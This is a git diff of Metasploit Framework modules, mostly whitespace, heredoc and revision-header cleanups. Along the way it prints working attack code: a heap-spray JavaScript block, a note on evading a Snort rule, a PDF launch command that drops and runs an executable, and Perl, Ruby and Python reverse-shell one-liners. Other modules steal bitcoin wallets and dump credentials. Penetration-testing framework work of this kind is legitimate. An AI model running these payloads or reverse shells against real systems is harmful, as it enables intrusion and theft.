@@ -291,7 +291,7 @@ else {
- |
+EOS
end
diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb
index e319b5b2e8..e17fd622bd 100644
--- a/modules/exploits/windows/browser/mozilla_mchannel.rb
+++ b/modules/exploits/windows/browser/mozilla_mchannel.rb
@@ -95,9 +95,9 @@ class Metasploit3 < Msf::Exploit::Remote
))
end
- def junk
- return rand_text_alpha(4).unpack("L")[0].to_i
- end
+ def junk
+ return rand_text_alpha(4).unpack("L")[0].to_i
+ end
def on_request_uri(cli, request)
diff --git a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb
index a3d8fe5d22..6bb3bce634 100644
--- a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb
+++ b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb
@@ -115,7 +115,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll"
- html = %Q|
+ html = <<-EOS
+
-
-
- EOF
+ content = <<-EOS
+
+
+
+
+
+
+EOS
#Remove the extra tabs from content
content = content.gsub(/^\t\t/, '')
diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb
index 9d59cb8c9b..dc7058e5fe 100644
--- a/modules/exploits/windows/browser/teechart_pro.rb
+++ b/modules/exploits/windows/browser/teechart_pro.rb
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
# twitter.com/net__ninja
'mr_me ', # initial discovery/msf module
'sinn3r', #Auto target, obfuscation, lots of testing
- ],
+ ],
'Version' => '$Revision$',
'References' =>
[
@@ -148,30 +148,30 @@ class Metasploit3 < Msf::Exploit::Remote
main_sym = 'main' #main function name
if my_target.name =~ /IE6/ or my_target.name =~ /IE7/
- js = <<-EOF
- var sc = unescape('#{sc}');
+ js = <<-EOS
+var sc = unescape('#{sc}');
- var nops = unescape('%u0c0c%u0c0c');
- var offset = 20;
- var s = offset + sc.length;
- while(nops.length < s) {
- nops += nops;
- }
- var chunk1 = nops.substring(0, s);
- var chunk2 = nops.substring(0, nops.length - s);
- while((chunk2.length + s) < 0x50000) {
- chunk2 = chunk2 + chunk2 + chunk1;
- }
- var blocks = new Array();
- for(var counter=0; counter<200; counter++){
- blocks[counter] = chunk2 + sc;
- }
+var nops = unescape('%u0c0c%u0c0c');
+var offset = 20;
+var s = offset + sc.length;
+while(nops.length < s) {
+ nops += nops;
+}
+var chunk1 = nops.substring(0, s);
+var chunk2 = nops.substring(0, nops.length - s);
+while((chunk2.length + s) < 0x50000) {
+ chunk2 = chunk2 + chunk2 + chunk1;
+}
+var blocks = new Array();
+for(var counter=0; counter<200; counter++){
+ blocks[counter] = chunk2 + sc;
+}
- function main()
- {
- #{obj_name}.AddSeries(#{my_target.ret});
- }
- EOF
+function main()
+{
+ #{obj_name}.AddSeries(#{my_target.ret});
+}
+EOS
end
#http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf
diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
index 46a15b3073..4ab6491b54 100644
--- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
+++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
@@ -372,8 +372,9 @@ class Metasploit3 < Msf::Exploit::Remote
def create_email_body_html(body, subject)
body = body.gsub(/\\[nr]/, "
\n") body = body.gsub(/\\t/, " ") - body = "\n\n\n\n" << subject << " \n\n\n" << body << "\n
\n\n" - return body + ret = "\n\n\n\n" + ret << "" << subject << " \n\n\n" << body << "\n
\n\n" + ret end def create_tnef_exploit diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb index 0c7dfc6f2d..13abefbcf0 100644 --- a/modules/exploits/windows/fileformat/adobe_libtiff.rb +++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb @@ -324,7 +324,8 @@ class Metasploit3 < Msf::Exploit::Remote end def make_xml(tiff_data) - xml_data = %Q| + xml_data = <<-EOS +
@@ -383,7 +384,7 @@ class Metasploit3 < Msf::Exploit::Remote
-|
+EOS
xml_data.gsub!(/REPLACE_TIFF/, tiff_data)
xml_data
diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
index 765199bdc6..207efa9889 100644
--- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
+++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
@@ -108,8 +108,8 @@ class Metasploit3 < Msf::Exploit::Remote
output = String.new()
output << "#{obj_num.to_i + 1} 0 obj\r<>/Desc(#{pdf_name})/Type/Filespec>>\rendobj\r"
- output << "#{obj_num.to_i + 2} 0 obj\r<>>>>stream\r#{stream}\r\nendstream\rendobj\r"
-
+ output << "#{obj_num.to_i + 2} 0 obj\r<>>>>"
+ output << "stream\r#{stream}\r\nendstream\rendobj\r"
return output
end
diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb
index 9a08f08c92..78e1e2e984 100644
--- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb
+++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb
@@ -152,7 +152,8 @@ class Metasploit3 < Msf::Exploit::Remote
xref << pdf.length
pdf << ioDef(5) << nObfu("< 1.vbs && cscript //B 1.vbs && start %TEMP%\\\\#{exe_name} && del /F 1.vbs"
pdf << eol << eol << eol << "#{launch_msg})"
pdf << ">>>>" << endobj
diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb
index edd7ff41c5..37c7abfffb 100644
--- a/modules/exploits/windows/fileformat/deepburner_path.rb
+++ b/modules/exploits/windows/fileformat/deepburner_path.rb
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
- template = <<-EOF
+ template = <<-EOS
@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
-EOF
+EOS
seh_offset = 272
path = make_nops(seh_offset)
diff --git a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb
old mode 100755
new mode 100644
diff --git a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb
index aba9f1f36d..cfc90c64fa 100644
--- a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb
+++ b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb
@@ -49,8 +49,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://www.exploit-db.com/exploits/8180' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12059/' ],
],
- 'Platform' => [ 'win' ],
- 'Payload' =>
+ 'Platform' => [ 'win' ],
+ 'Payload' =>
{
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
},
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0))
register_options(
- [
+ [
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
OptString.new('USERNAME', [ true, 'Username', ''])
], self.class)
@@ -83,10 +83,10 @@ class Metasploit3 < Msf::Exploit::Remote
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
[ 'x86/alpha_mixed'].each { |name|
- enc = framework.encoders.create(name)
- if name =~/alpha/
- enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
- end
+ enc = framework.encoders.create(name)
+ if name =~/alpha/
+ enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
+ end
hunter = enc.encode(hunter, nil, nil, platform)
}
diff --git a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
index 904f2ec955..c6b39275a8 100644
--- a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
+++ b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
@@ -106,5 +106,5 @@ createDataObject\('#{path_new + decoder_file + '.bat'}', unescape\(\"#{decoder}\
decoder.gsub!(/decode_stub/, "C:/Windows/Temp/" + decoder_file + '.vbs')
return decoder = Rex::Text.uri_encode(decoder)
- end
+ end
end
diff --git a/modules/exploits/windows/fileformat/scadaphone_zip.rb b/modules/exploits/windows/fileformat/scadaphone_zip.rb
index 74a4eebbbc..158f1c3dab 100644
--- a/modules/exploits/windows/fileformat/scadaphone_zip.rb
+++ b/modules/exploits/windows/fileformat/scadaphone_zip.rb
@@ -43,8 +43,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://www.scadatec.com/' ],
[ 'URL', 'http://www.exploit-db.com/exploits/17817/' ],
],
- 'Platform' => [ 'win' ],
- 'Payload' =>
+ 'Platform' => [ 'win' ],
+ 'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00\x0a\x0d",
@@ -59,10 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0))
register_options(
- [
- OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
- ], self.class)
-
+ [
+ OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
+ ], self.class)
end
def exploit
diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb
index 6af49766f3..fef83c5f34 100644
--- a/modules/exploits/windows/http/hp_nnm_ovas.rb
+++ b/modules/exploits/windows/http/hp_nnm_ovas.rb
@@ -9,11 +9,11 @@
# http://metasploit.com/framework/
##
-##
+=begin
# This should bypass the following snort rule referenced from web-misc.rules (10/17/2008)
# alert tcp $EXTERNAL_NET any -> $HOME_NET 7510 (msg:"WEB-MISC HP OpenView Network Node Manager HTTP handling buffer overflow attempt"; flow:to_server,established; content:"GET "; depth:4; nocase; isdataat:165,relative; content:"/topology/homeBaseView"; pcre:"/GET\s+\w[^\x0a\x20]{165}/i"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,28569; reference:cve,2008-1697; classtype:attempted-admin; sid:13715; rev:3;)
# Newer versions of this rule might find this but we've taken steps to atleast bypass this rule
-##
+=end
require 'msf/core'
@@ -94,7 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(7510),
- OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ])
+ OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request",
+ 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ])
], self.class)
end
diff --git a/modules/exploits/windows/http/hp_power_manager_filename.rb b/modules/exploits/windows/http/hp_power_manager_filename.rb
index 60dec780e5..26fb75f5d4 100644
--- a/modules/exploits/windows/http/hp_power_manager_filename.rb
+++ b/modules/exploits/windows/http/hp_power_manager_filename.rb
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
which may result aribitrary remote code execution under the context of 'SYSTEM'.
},
'License' => MSF_LICENSE,
- 'Author' =>
+ 'Author' =>
[
# Original discovery (Secunia Research)
'Alin Rad Pop',
diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb
index 8e94cdce9f..4f7025640d 100644
--- a/modules/exploits/windows/http/osb_uname_jlist.rb
+++ b/modules/exploits/windows/http/osb_uname_jlist.rb
@@ -117,6 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
+
__END__
else if (strcmp($type, "Job") == 0)
{
diff --git a/modules/exploits/windows/misc/wireshark_packet_dect.rb b/modules/exploits/windows/misc/wireshark_packet_dect.rb
index 5bc3a7c21d..f605077d09 100644
--- a/modules/exploits/windows/misc/wireshark_packet_dect.rb
+++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb
@@ -166,9 +166,8 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Sending malicious packet")
open_pcap()
-
- #handler
+ #handler
if datastore['LOOP']
while true
break if session_created? and datastore['ExitOnSession']
diff --git a/modules/payloads/singles/linux/armle/adduser.rb b/modules/payloads/singles/linux/armle/adduser.rb
old mode 100755
new mode 100644
index c750ba303b..9f5708f315
--- a/modules/payloads/singles/linux/armle/adduser.rb
+++ b/modules/payloads/singles/linux/armle/adduser.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
diff --git a/modules/payloads/singles/linux/x64/exec.rb b/modules/payloads/singles/linux/x64/exec.rb
index 3f32ace328..004f5b0b13 100644
--- a/modules/payloads/singles/linux/x64/exec.rb
+++ b/modules/payloads/singles/linux/x64/exec.rb
@@ -1,3 +1,15 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
require 'msf/core'
module Metasploit3
diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb
index bb43d07c12..87abc8d704 100644
--- a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb
@@ -1,3 +1,15 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
diff --git a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb
index fdc98a33ec..b5c4bfc05d 100644
--- a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb
@@ -1,3 +1,15 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb
index e4b5dabd80..6c400da7f4 100644
--- a/modules/payloads/singles/windows/exec.rb
+++ b/modules/payloads/singles/windows/exec.rb
@@ -19,6 +19,7 @@ require 'msf/core/payload/windows/exec'
###
module Metasploit3
+ # $Revision$
include Msf::Payload::Windows::Exec
end
diff --git a/modules/payloads/singles/windows/loadlibrary.rb b/modules/payloads/singles/windows/loadlibrary.rb
index 7240378021..d306a93937 100644
--- a/modules/payloads/singles/windows/loadlibrary.rb
+++ b/modules/payloads/singles/windows/loadlibrary.rb
@@ -19,6 +19,7 @@ require 'msf/core/payload/windows/loadlibrary'
###
module Metasploit3
+ # $Revision$
include Msf::Payload::Windows::LoadLibrary
end
diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb
index fe7354800e..7b84375422 100644
--- a/modules/payloads/stagers/java/reverse_https.rb
+++ b/modules/payloads/stagers/java/reverse_https.rb
@@ -20,7 +20,7 @@ module Metasploit3
def initialize(info = {})
super(merge_info(info,
'Name' => 'Java Reverse HTTPS Stager',
- 'Version' => '$Revision: 13402 $',
+ 'Version' => '$Revision$',
'Description' => 'Tunnel communication over HTTPS',
'Author' => [
'mihi', # all the hard work
diff --git a/modules/payloads/stagers/linux/x64/bind_tcp.rb b/modules/payloads/stagers/linux/x64/bind_tcp.rb
index ee0e8285d5..fc4e3fb6dd 100644
--- a/modules/payloads/stagers/linux/x64/bind_tcp.rb
+++ b/modules/payloads/stagers/linux/x64/bind_tcp.rb
@@ -1,3 +1,15 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
require 'msf/core'
require 'msf/core/handler/bind_tcp'
diff --git a/modules/payloads/stagers/linux/x64/reverse_tcp.rb b/modules/payloads/stagers/linux/x64/reverse_tcp.rb
index 36fb62eda0..a2be9a7899 100644
--- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb
@@ -1,3 +1,15 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
diff --git a/modules/payloads/stages/linux/x64/shell.rb b/modules/payloads/stages/linux/x64/shell.rb
index f71eda8be5..8770ac00e4 100644
--- a/modules/payloads/stages/linux/x64/shell.rb
+++ b/modules/payloads/stages/linux/x64/shell.rb
@@ -1,3 +1,15 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
diff --git a/modules/payloads/stages/osx/x86/bundleinject.rb b/modules/payloads/stages/osx/x86/bundleinject.rb
index 47daaaf731..e001b8a48b 100644
--- a/modules/payloads/stages/osx/x86/bundleinject.rb
+++ b/modules/payloads/stages/osx/x86/bundleinject.rb
@@ -19,6 +19,7 @@ require 'msf/core/payload/osx/bundleinject'
###
module Metasploit3
+ # $Revision$
include Msf::Payload::Osx::BundleInject
end
diff --git a/modules/payloads/stages/windows/dllinject.rb b/modules/payloads/stages/windows/dllinject.rb
index 6a3b68cfcd..c181777f9e 100644
--- a/modules/payloads/stages/windows/dllinject.rb
+++ b/modules/payloads/stages/windows/dllinject.rb
@@ -21,6 +21,7 @@ require 'msf/core/payload/windows/reflectivedllinject'
###
module Metasploit3
+ # $Revision$
include Msf::Payload::Windows::ReflectiveDllInject
end
diff --git a/modules/payloads/stages/windows/patchupdllinject.rb b/modules/payloads/stages/windows/patchupdllinject.rb
index fea3e648a1..945f5e168d 100644
--- a/modules/payloads/stages/windows/patchupdllinject.rb
+++ b/modules/payloads/stages/windows/patchupdllinject.rb
@@ -19,6 +19,7 @@ require 'msf/core/payload/windows/dllinject'
###
module Metasploit3
+ # $Revision$
include Msf::Payload::Windows::DllInject
end
diff --git a/modules/post/multi/gather/dns_bruteforce.rb b/modules/post/multi/gather/dns_bruteforce.rb
index 9db94f2341..2b6e0b634a 100644
--- a/modules/post/multi/gather/dns_bruteforce.rb
+++ b/modules/post/multi/gather/dns_bruteforce.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Multi Gather DNS Forward Lookup Bruteforce',
- 'Description' => %q{
+ 'Description' => %q{
Brute force subdomains and hostnames via wordlist.
},
'License' => MSF_LICENSE,
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
# Run Method for when run command is issued
def run
-
+
domain = datastore['DOMAIN']
hostlst = datastore['NAMELIST']
i, a = 0, []
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Post
ns_opt = " #{n.strip}.#{domain}"
cmd = "/usr/bin/host"
end
-
+
if i <= thread_num
print_status("Trying #{ns_opt}")
a.push(::Thread.new {
@@ -126,4 +126,4 @@ class Metasploit3 < Msf::Post
end
end
end
-end
\ No newline at end of file
+end
diff --git a/modules/post/multi/gather/dns_srv_lookup.rb b/modules/post/multi/gather/dns_srv_lookup.rb
index 145dbe607b..10c29689f6 100644
--- a/modules/post/multi/gather/dns_srv_lookup.rb
+++ b/modules/post/multi/gather/dns_srv_lookup.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Multi Gather DNS Service Record Lookup Scan',
- 'Description' => %q{
+ 'Description' => %q{
Enumerates know SRV Records for a given domaon using target host DNS query tool.
},
'License' => MSF_LICENSE,
@@ -42,21 +42,21 @@ class Metasploit3 < Msf::Post
# Run Method for when run command is issued
def run
srvrcd = [
- '_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.',
- '_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.',
- '_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.',
- '_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.',
- '_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.',
- '_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.',
- '_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.',
- '_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.',
- '_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.',
- '_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.',
- '_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.',
- '_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.',
- '_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.',
- '_ldap._tcp.ForestDNSZones.'
- ]
+ '_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.',
+ '_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.',
+ '_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.',
+ '_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.',
+ '_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.',
+ '_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.',
+ '_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.',
+ '_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.',
+ '_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.',
+ '_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.',
+ '_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.',
+ '_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.',
+ '_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.',
+ '_ldap._tcp.ForestDNSZones.'
+ ]
domain = datastore['DOMAIN']
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Post
ip_map[host.strip] = ip.strip
end
end
-
+
# Get SRV parameter for each record
records.each do |r|
if r =~ /svr hostname/
@@ -158,7 +158,7 @@ class Metasploit3 < Msf::Post
srv_records << rcrd
end
else
-
+
rcrd[:ip] = ip_map[rcrd[:target]]
# Report hosts found
report_host(:host => rcrd[:ip].strip, :name => rcrd[:target])
@@ -258,4 +258,4 @@ class Metasploit3 < Msf::Post
end
return srv_records
end
-end
\ No newline at end of file
+end
diff --git a/modules/post/multi/gather/ping_sweep.rb b/modules/post/multi/gather/ping_sweep.rb
index 1dd5850655..0ceb73b4d5 100644
--- a/modules/post/multi/gather/ping_sweep.rb
+++ b/modules/post/multi/gather/ping_sweep.rb
@@ -49,9 +49,9 @@ class Metasploit3 < Msf::Post
numip = ipadd.num_ips
while (iplst.length < numip)
ipa = ipadd.next_ip
- if (not ipa)
- break
- end
+ if (not ipa)
+ break
+ end
iplst << ipa
end
if session.type =~ /shell/
diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb
index 4aef47414c..2b6a4177ad 100644
--- a/modules/post/multi/manage/system_session.rb
+++ b/modules/post/multi/manage/system_session.rb
@@ -43,8 +43,8 @@ class Metasploit3 < Msf::Post
[false, 'Port for Payload to connect to.', 4433]),
OptBool.new('HANDLER',
[ true, 'Start an Exploit Multi Handler to receive the connection', false]),
- OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell',\
- 'auto', ['auto','ruby','python','perl','bash']])
+ OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell',
+ 'auto', ['auto','ruby','python','perl','bash']])
], self.class)
end
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post
lport = datastore['LPORT']
cmd = ""
case datastore['type']
- when /auto/i
+ when /auto/i
cmd = auto_create_session(lhost,lport)
when /ruby/i
cmd = ruby_session(lhost,lport)
@@ -153,8 +153,8 @@ class Metasploit3 < Msf::Post
def perl_session(lhost,lport)
if cmd_exec("perl -v") =~ /Larry/
print_status("Perl reverse shell selected")
- cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET \
-(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
+ cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET " +
+ "(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
else
print_error("No scripting environment found for the selected type.")
cmd =""
@@ -166,8 +166,8 @@ class Metasploit3 < Msf::Post
def ruby_session(lhost,lport)
if cmd_exec("ruby -v") =~ /revision/i
print_status("Ruby reverse shell selected")
- return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");\
-while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"
+ return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");" +
+ "while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"
else
print_error("No scripting environment found for the selected type.")
cmd =""
@@ -179,9 +179,9 @@ while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'
def python_session(lhost,lport)
if cmd_exec("python -V") =~ /Python 2\.(\d)/
print_status("Python reverse shell selected")
- return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,\
-socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);\
-os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
+ return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," +
+ "socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);" +
+ "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
else
print_error("No scripting environment found for the selected type.")
cmd =""
@@ -200,4 +200,4 @@ os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
end
return cmd
end
-end
\ No newline at end of file
+end
diff --git a/modules/post/windows/gather/arp_scanner.rb b/modules/post/windows/gather/arp_scanner.rb
index 327261fdd4..c3872e1c22 100644
--- a/modules/post/windows/gather/arp_scanner.rb
+++ b/modules/post/windows/gather/arp_scanner.rb
@@ -68,13 +68,7 @@ class Metasploit3 < Msf::Post
ip = h["return"]
h = iphlp.SendARP(ip,0,6,6)
if h["return"] == client.railgun.const("NO_ERROR")
- mac = h["pMacAddr"]
- mac_text = mac[0].ord.to_s(16) + ":" +
- mac[1].ord.to_s(16) + ":" +
- mac[2].ord.to_s(16) + ":" +
- mac[3].ord.to_s(16) + ":" +
- mac[4].ord.to_s(16) + ":" +
- mac[5].ord.to_s(16)
+ mac_text = h["pMacAddr"].unpack('C*').map { |e| "%02x" % e }.join(':')
print_status("\tIP: #{ip_text} MAC #{mac_text}")
report_host(:host => ip_text,:mac => mac_text)
end
diff --git a/modules/post/windows/gather/bitcoin_jacker.rb b/modules/post/windows/gather/bitcoin_jacker.rb
old mode 100755
new mode 100644
index e5c4792b78..af1ea56f91
--- a/modules/post/windows/gather/bitcoin_jacker.rb
+++ b/modules/post/windows/gather/bitcoin_jacker.rb
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Post
wallet = session.fs.file.new(filename, "rb")
until wallet.eof?
data << wallet.read
- end
+ end
store_loot("bitcoin.wallet", "application/octet-stream", session, data, filename, "Bitcoin Wallet")
print_status(" Wallet Jacked.")
diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb
index ffe83ad3f9..3aad4255e3 100644
--- a/modules/post/windows/gather/cachedump.rb
+++ b/modules/post/windows/gather/cachedump.rb
@@ -328,7 +328,7 @@ class Metasploit3 < Msf::Post
hash.unpack("H*")[0],
logonDomainName,
dnsDomainName,
- last.strftime("%F %T"),
+ last.strftime("%F %T"),
upn,
effectiveName,
fullName,
diff --git a/modules/post/windows/gather/credentials/enum_cred_store.rb b/modules/post/windows/gather/credentials/enum_cred_store.rb
index 5d64667166..f94a26c641 100644
--- a/modules/post/windows/gather/credentials/enum_cred_store.rb
